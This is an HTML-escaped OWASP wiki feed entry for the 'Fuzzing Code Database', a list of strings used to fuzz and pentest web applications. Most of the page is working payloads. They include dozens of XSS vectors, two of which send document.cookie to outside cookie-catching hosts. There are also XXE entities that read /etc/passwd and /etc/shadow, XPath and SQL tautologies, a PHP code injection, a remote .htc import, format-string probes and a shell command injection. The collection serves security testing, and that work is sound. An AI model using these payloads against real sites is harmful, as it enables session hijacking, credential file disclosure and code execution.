&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;livescript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;a href=&amp;quot;&amp;quot;about:&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;meta http-equiv=&amp;quot;&amp;quot;refresh&amp;quot;&amp;quot; content=&amp;quot;&amp;quot;0;url=javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;body onload=&amp;quot;&amp;quot;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;background-image: url(javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;););&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;behaviour: url([link to code]);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;binding: url([link to code]);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;width: expression(document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;););&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;style type=&amp;quot;&amp;quot;text/javascript&amp;quot;&amp;quot;&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/style&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;object classid=&amp;quot;&amp;quot;clsid:...&amp;quot;&amp;quot; codebase=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;style&amp;amp;gt;&amp;amp;lt;!--&amp;amp;lt;/style&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);//--&amp;amp;gt;&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;![CDATA[&amp;amp;lt;!--]]&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);//--&amp;amp;gt;&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;blah&amp;quot;&amp;quot;onmouseover=&amp;quot;&amp;quot;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;blah&amp;amp;gt;&amp;quot;&amp;quot; onmouseover=&amp;quot;&amp;quot;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div datafld=&amp;quot;&amp;quot;b&amp;quot;&amp;quot; dataformatas=&amp;quot;&amp;quot;html&amp;quot;&amp;quot; datasrc=&amp;quot;&amp;quot;#X&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/div&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;a href=&amp;quot;&amp;quot;javascript#document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img dynsrc=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;amp;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;img src=&amp;quot;&amp;quot;mocha:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;div style=&amp;quot;&amp;quot;binding: url([link to code]);&amp;quot;&amp;quot;&amp;amp;gt; [Mozilla]&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;!-- -- --&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;&amp;amp;lt;!-- -- --&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml src=&amp;quot;&amp;quot;javascript:document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml id=&amp;quot;&amp;quot;X&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;a&amp;amp;gt;&amp;amp;lt;b&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);&amp;amp;lt;/script&amp;amp;gt;;&amp;amp;lt;/b&amp;amp;gt;&amp;amp;lt;/a&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;[\xC0][\xBC]script&amp;amp;gt;document.write(&amp;quot;&amp;quot;XSS-XSS-XSS&amp;quot;&amp;quot;);[\xC0][\xBC]/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;script&amp;amp;gt;alert(&amp;quot;&amp;quot;WXSS&amp;quot;&amp;quot;)&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;&amp;amp;lt;script&amp;amp;gt;alert(&amp;quot;&amp;quot;WXSS&amp;quot;&amp;quot;);//&amp;amp;lt;&amp;amp;lt;/script&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;script&amp;amp;gt;alert(document.cookie)&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
'&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;alert(document.cookie)&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
'&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;alert(document.cookie);&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
&amp;quot;%3cscript%3ealert(&amp;quot;&amp;quot;WXSS&amp;quot;&amp;quot;);%3c/script%3e&amp;quot;&lt;br /&gt;
%3cscript%3ealert(document.cookie);%3c%2fscript%3e&lt;br /&gt;
%3Cscript%3Ealert(%22X%20SS%22);%3C/script%3E&lt;br /&gt;
&amp;amp;amp;ltscript&amp;amp;amp;gtalert(document.cookie);&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
&amp;amp;amp;ltscript&amp;amp;amp;gtalert(document.cookie);&amp;amp;amp;ltscript&amp;amp;amp;gtalert&lt;br /&gt;
&amp;amp;lt;xss&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;alert('WXSS')&amp;amp;lt;/script&amp;amp;gt;&amp;amp;lt;/vulnerable&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC='javascript:alert(document.cookie)'&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;javascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;javascript:alert('WXSS')&amp;quot;&amp;quot;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=JaVaScRiPt:alert('WXSS')&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=javascript:alert(&amp;quot;WXSS&amp;quot;)&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=`javascript:alert(&amp;quot;&amp;quot;'WXSS'&amp;quot;&amp;quot;)`&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(&amp;quot;&amp;quot;WXSS&amp;quot;&amp;quot;)&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=javascript:alert(String.fromCharCode(88,83,83))&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC='javasc&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;jav&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;jav	ascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;jav&lt;br /&gt;
ascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;jav&lt;br /&gt;
ascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20SRC=&amp;quot;&amp;quot;%20&amp;amp;amp;#14;%20javascript:alert('WXSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20DYNSRC=&amp;quot;&amp;quot;javascript:alert('WXSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG%20LOWSRC=&amp;quot;&amp;quot;javascript:alert('WXSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC='%26%23x6a;avasc%26%23000010ript:a%26%23x6c;ert(document.%26%23x63;ookie)'&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=javascript:alert('XSS')&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=&amp;amp;amp;#0000106&amp;amp;amp;#0000097&amp;amp;amp;#0000118&amp;amp;amp;#0000097&amp;amp;amp;#0000115&amp;amp;amp;#0000099&amp;amp;amp;#0000114&amp;amp;amp;#0000105&amp;amp;amp;#0000112&amp;amp;amp;#0000116&amp;amp;amp;#0000058&amp;amp;amp;#0000097&amp;amp;amp;#0000108&amp;amp;amp;#0000101&amp;amp;amp;#0000114&amp;amp;amp;#0000116&amp;amp;amp;#0000040&amp;amp;amp;#0000039&amp;amp;amp;#0000088&amp;amp;amp;#0000083&amp;amp;amp;#0000083&amp;amp;amp;#0000039&amp;amp;amp;#0000041&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG%20SRC=&amp;amp;amp;#x6A&amp;amp;amp;#x61&amp;amp;amp;#x76&amp;amp;amp;#x61&amp;amp;amp;#x73&amp;amp;amp;#x63&amp;amp;amp;#x72&amp;amp;amp;#x69&amp;amp;amp;#x70&amp;amp;amp;#x74&amp;amp;amp;#x3A&amp;amp;amp;#x61&amp;amp;amp;#x6C&amp;amp;amp;#x65&amp;amp;amp;#x72&amp;amp;amp;#x74&amp;amp;amp;#x28&amp;amp;amp;#x27&amp;amp;amp;#x58&amp;amp;amp;#x53&amp;amp;amp;#x53&amp;amp;amp;#x27&amp;amp;amp;#x29&amp;amp;gt;&lt;br /&gt;
'%3CIFRAME%20SRC=javascript:alert(%2527XSS%2527)%3E%3C/IFRAME%3E&lt;br /&gt;
&amp;quot;&amp;amp;gt;&amp;amp;lt;script&amp;amp;gt;document.location='http://cookieStealer/cgi-bin/cookie.cgi?'+document.cookie&amp;amp;lt;/script&amp;amp;gt;&lt;br /&gt;
%22%3E%3Cscript%3Edocument%2Elocation%3D%27http%3A%2F%2Fyour%2Esite%2Ecom%2Fcgi%2Dbin%2Fcookie%2Ecgi%3F%27%20%2Bdocument%2Ecookie%3C%2Fscript%3E&lt;br /&gt;
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//;alert(String.fromCharCode(88,83,83))//\;alert(String.fromCharCode(88,83,83))//&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;!--&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt;=&amp;amp;amp;{}&lt;br /&gt;
'';!--&amp;amp;lt;XSS&amp;amp;gt;=&amp;amp;amp;{()}&amp;quot;&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== XML Attacks - (Update: 11 August 2009 - Total Statements: 15)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;Statements&lt;br /&gt;
count(/child::node())&lt;br /&gt;
x' or name()='username' or 'x'='y&lt;br /&gt;
&amp;amp;lt;name&amp;amp;gt;','')); phpinfo(); exit;/*&amp;amp;lt;/name&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;![CDATA[&amp;amp;lt;script&amp;amp;gt;var n=0;while(true){n++;}&amp;amp;lt;/script&amp;amp;gt;]]&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;![CDATA[&amp;amp;lt;]]&amp;amp;gt;SCRIPT&amp;amp;lt;![CDATA[&amp;amp;gt;]]&amp;amp;gt;alert('XSS');&amp;amp;lt;![CDATA[&amp;amp;lt;]]&amp;amp;gt;/SCRIPT&amp;amp;lt;![CDATA[&amp;amp;gt;]]&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;lt;![CDATA[&amp;amp;lt;]]&amp;amp;gt;SCRIPT&amp;amp;lt;![CDATA[&amp;amp;gt;]]&amp;amp;gt;alert('XSS');&amp;amp;lt;![CDATA[&amp;amp;lt;]]&amp;amp;gt;/SCRIPT&amp;amp;lt;![CDATA[&amp;amp;gt;]]&amp;amp;gt;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;lt;![CDATA[' or 1=1 or ''=']]&amp;amp;gt;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file://c:/boot.ini&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file:////etc/passwd&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file:////etc/shadow&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file:////dev/random&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml ID=I&amp;amp;gt;&amp;amp;lt;X&amp;amp;gt;&amp;amp;lt;C&amp;amp;gt;&amp;amp;lt;![CDATA[&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javas]]&amp;amp;gt;&amp;amp;lt;![CDATA[cript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;]]&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml ID=&amp;quot;&amp;quot;xss&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;I&amp;amp;gt;&amp;amp;lt;B&amp;amp;gt;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javas&amp;amp;lt;!-- --&amp;amp;gt;cript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/B&amp;amp;gt;&amp;amp;lt;/I&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=&amp;quot;&amp;quot;#xss&amp;quot;&amp;quot; DATAFLD=&amp;quot;&amp;quot;B&amp;quot;&amp;quot; DATAFORMATAS=&amp;quot;&amp;quot;HTML&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;amp;lt;/C&amp;amp;gt;&amp;amp;lt;/X&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml SRC=&amp;quot;&amp;quot;xsstest.xml&amp;quot;&amp;quot; ID=I&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;HTML xmlns:xss&amp;amp;gt;&amp;amp;lt;?import namespace=&amp;quot;&amp;quot;xss&amp;quot;&amp;quot; implementation=&amp;quot;&amp;quot;http://ha.ckers.org/xss.htc&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;xss:xss&amp;amp;gt;XSS&amp;amp;lt;/xss:xss&amp;amp;gt;&amp;amp;lt;/HTML&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
=== Format String Statements - (Update: 30 July 2007 - Total Statements: 28) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# Full List&lt;br /&gt;
# Format String tests to determine errors in variable handling&lt;br /&gt;
# Foobar@email.de&lt;br /&gt;
&lt;br /&gt;
%s%p%x%d&lt;br /&gt;
.1024d&lt;br /&gt;
%.2049d&lt;br /&gt;
%p%p%p%p&lt;br /&gt;
%x%x%x%x&lt;br /&gt;
%d%d%d%d&lt;br /&gt;
%s%s%s%s&lt;br /&gt;
%99999999999s&lt;br /&gt;
%08x&lt;br /&gt;
%%20d&lt;br /&gt;
%%20n&lt;br /&gt;
%%20x&lt;br /&gt;
%%20s&lt;br /&gt;
%s%s%s%s%s%s%s%s%s%s&lt;br /&gt;
%p%p%p%p%p%p%p%p%p%p&lt;br /&gt;
%#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%&lt;br /&gt;
f(x)=%s x 123&lt;br /&gt;
f(x)=%x x 255&lt;br /&gt;
%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x&lt;br /&gt;
%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s&lt;br /&gt;
XXXXX.%p&lt;br /&gt;
XXXXX`perl -e 'print &amp;quot;.%p&amp;quot; x 80'`&lt;br /&gt;
`perl -e 'print &amp;quot;.%p&amp;quot; x 80'`%n&lt;br /&gt;
%08x.%08x.%08x.%08x.%08x\n&lt;br /&gt;
XXX0_%08x.%08x.%08x.%08x.%08x\n&lt;br /&gt;
%.16705u%2\$hn&lt;br /&gt;
\x10\x01\x48\x08_%08x.%08x.%08x.%08x.%08x|%s|&lt;br /&gt;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;id &amp;amp;gt; /tmp/file; exit;&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
==== Project Contributor  ====&lt;br /&gt;
&lt;br /&gt;
Project Leader: [[:User:Wagner.elias|'''Wagner Elias''']] &lt;br /&gt;
&lt;br /&gt;
Reviewer: [[:User:eneves|'''Eduardo Neves''']] &lt;br /&gt;
&lt;br /&gt;
Contributor: [[:User:ulisses.castro|'''Ulisses Castro''']] [[:User:Adam.muntner|'''Adam Muntner''']] &lt;br /&gt;
&lt;br /&gt;
==== Feedback and Participation  ====&lt;br /&gt;
&lt;br /&gt;
We hope you find the Fuzzing Code Database useful. Please contribute to the Project by volunteering for one of the tasks, sending your comments, questions, and suggestions to wagner.elias |at| owasp.org &lt;br /&gt;
&lt;br /&gt;
==== Project Identification  ====&lt;br /&gt;
&lt;br /&gt;
{{Template:OWASP Project Identification Tab&lt;br /&gt;
| project_name = OWASP Fuzzing Code Database&lt;br /&gt;
| project_description = &lt;br /&gt;
| leader_name = Wagner Elias&lt;br /&gt;
| leader_email = &lt;br /&gt;
| leader_username = Wagner.elias&lt;br /&gt;
| maintainer_name = &lt;br /&gt;
| maintainer_email = &lt;br /&gt;
| maintainer_username = &lt;br /&gt;
| contributor_name1 = &lt;br /&gt;
| contributor_email1 = &lt;br /&gt;
| contributor_username1 = &lt;br /&gt;
| contributor_name2 = &lt;br /&gt;
| contributor_email2 = &lt;br /&gt;
| contributor_username2 = &lt;br /&gt;
| contributor_name3 = &lt;br /&gt;
| contributor_email3 = &lt;br /&gt;
| contributor_username3 = &lt;br /&gt;
| contributor_name4 = &lt;br /&gt;
| contributor_email4 = &lt;br /&gt;
| contributor_username4 = &lt;br /&gt;
| contributor_name5 = &lt;br /&gt;
| contributor_email5 = &lt;br /&gt;
| contributor_username5 = &lt;br /&gt;
| contributor_name6 = &lt;br /&gt;
| contributor_email6 = &lt;br /&gt;
| contributor_username6 = &lt;br /&gt;
| contributor_name7 = &lt;br /&gt;
| contributor_email7 = &lt;br /&gt;
| contributor_username7 = &lt;br /&gt;
| contributor_name8 = &lt;br /&gt;
| contributor_email8 = &lt;br /&gt;
| contributor_username8 = &lt;br /&gt;
| contributor_name9 = &lt;br /&gt;
| contributor_email9 = &lt;br /&gt;
| contributor_username9 = &lt;br /&gt;
| contributor_name10 = &lt;br /&gt;
| contributor_email10 = &lt;br /&gt;
| contributor_username10 =  &lt;br /&gt;
| pamphlet_link = &lt;br /&gt;
| mailing_list_name = owasp-fuzzing-code-database&lt;br /&gt;
| links_url1 = &lt;br /&gt;
| links_name1 = &lt;br /&gt;
| links_url2 = &lt;br /&gt;
| links_name2 = &lt;br /&gt;
| links_url3 = &lt;br /&gt;
| links_name3 = &lt;br /&gt;
| links_url4 = &lt;br /&gt;
| links_name4 = &lt;br /&gt;
| links_url5 = &lt;br /&gt;
| links_name5 = &lt;br /&gt;
| links_url6 = &lt;br /&gt;
| links_name6 = &lt;br /&gt;
| links_url7 = &lt;br /&gt;
| links_name7 = &lt;br /&gt;
| links_url8 = &lt;br /&gt;
| links_name8 = &lt;br /&gt;
| links_url9 = &lt;br /&gt;
| links_name9 = &lt;br /&gt;
| links_url10 = &lt;br /&gt;
| links_name10 = &lt;br /&gt;
| project_road_map =&lt;br /&gt;
| project_health_status = &lt;br /&gt;
| current_release_name = &lt;br /&gt;
| current_release_date = &lt;br /&gt;
| current_release_download_link = &lt;br /&gt;
| current_release_rating = &lt;br /&gt;
| current_release_leader_name = &lt;br /&gt;
| current_release_leader_email = &lt;br /&gt;
| current_release_leader_username = &lt;br /&gt;
| last_reviewed_release_name = &lt;br /&gt;
| last_reviewed_release_date = &lt;br /&gt;
| last_reviewed_release_download_link = &lt;br /&gt;
| last_reviewed_release_rating = &lt;br /&gt;
| last_reviewed_release_leader_name = &lt;br /&gt;
| last_reviewed_release_leader_email = &lt;br /&gt;
| last_reviewed_release_leader_username = &lt;br /&gt;
| old_release_name1 = &lt;br /&gt;
| old_release_date1 = &lt;br /&gt;
| old_release_download_link1 = &lt;br /&gt;
| old_release_name2 = &lt;br /&gt;
| old_release_date2 = &lt;br /&gt;
| old_release_download_link2 = &lt;br /&gt;
| old_release_name3 = &lt;br /&gt;
| old_release_date3 = &lt;br /&gt;
| old_release_download_link3 = &lt;br /&gt;
| old_release_name4 = &lt;br /&gt;
| old_release_date4 = &lt;br /&gt;
| old_release_download_link4 = &lt;br /&gt;
| old_release_name5 = &lt;br /&gt;
| old_release_date5 = &lt;br /&gt;
| old_release_download_link5 = &lt;br /&gt;
}} __NOTOC__ &amp;lt;headertabs /&amp;gt; &lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP_Project|Fuzzing Code Database]] [[Category:OWASP_Document]] [[Category:OWASP_Alpha_Quality_Document]]&lt;/div&gt;</summary>
		<author><name>Adam.muntner</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Category:OWASP_Fuzzing_Code_Database&amp;diff=81140</id>
		<title>Category:OWASP Fuzzing Code Database</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Category:OWASP_Fuzzing_Code_Database&amp;diff=81140"/>
				<updated>2010-04-08T18:41:02Z</updated>
		
		<summary type="html">&lt;p&gt;Adam.muntner: /* Microsoft URLs (18 March 2010) */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;This database is a collection of several statements used in code injection, fuzzing and brute-force aproach. All too often security professionals rely on their own repositories of statements collected from assessments they've conducted. These repositories are prone to being incomplete or outdated. We want to collect all these statements, merging the statements from several projects like [[WebScarab]], [[WebSlayer]] and [[JBroFuzz]] with member contributions to build a comprehensive dataset of effective statements to provide better testing results. Please add your own statements and check out the statements already added. &lt;br /&gt;
&lt;br /&gt;
==== News  ====&lt;br /&gt;
&lt;br /&gt;
'''17 March 2010'''&lt;br /&gt;
&lt;br /&gt;
*Created new Category: Vulnerable Cross-Platform CGI (17 March 2010 - Total Statements: 563)&lt;br /&gt;
*Created new Category: Windows Directory Traversal (Update: 17 March 2010 - Total Statements: 16)&lt;br /&gt;
*Created new Category: Generic 8 Directory Deep Traversal Fuzz (17 March 2010 - Total Statements: 879)&lt;br /&gt;
